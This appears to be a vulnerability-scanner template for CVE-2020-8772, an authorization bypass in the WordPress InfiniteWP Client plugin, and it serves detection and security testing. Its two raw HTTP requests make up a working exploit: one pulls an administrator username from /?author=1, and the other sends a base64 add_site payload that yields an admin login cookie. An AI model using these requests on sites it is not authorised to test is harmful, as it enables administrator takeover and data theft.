id: CVE-2020-8772 info: name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass author: princechaddha,scent2d severity: critical description: | WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://wpscan.com/vulnerability/10011 - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ - https://wpvulndb.com/vulnerabilities/10011 - https://nvd.nist.gov/vuln/detail/CVE-2020-8772 remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8772 cwe-id: CWE-862 epss-score: 0.96952 cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true framework: wordpress vendor: revmakx product: infinitewp_client tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,infinitewp,auth-bypass http: - raw: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 - | POST / HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} host-redirects: true matchers-condition: and matchers: - type: word part: header words: - "wordpress_logged_in" - type: word part: body words: - "" - type: status status: - 200 extractors: - type: regex name: username group: 1 regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?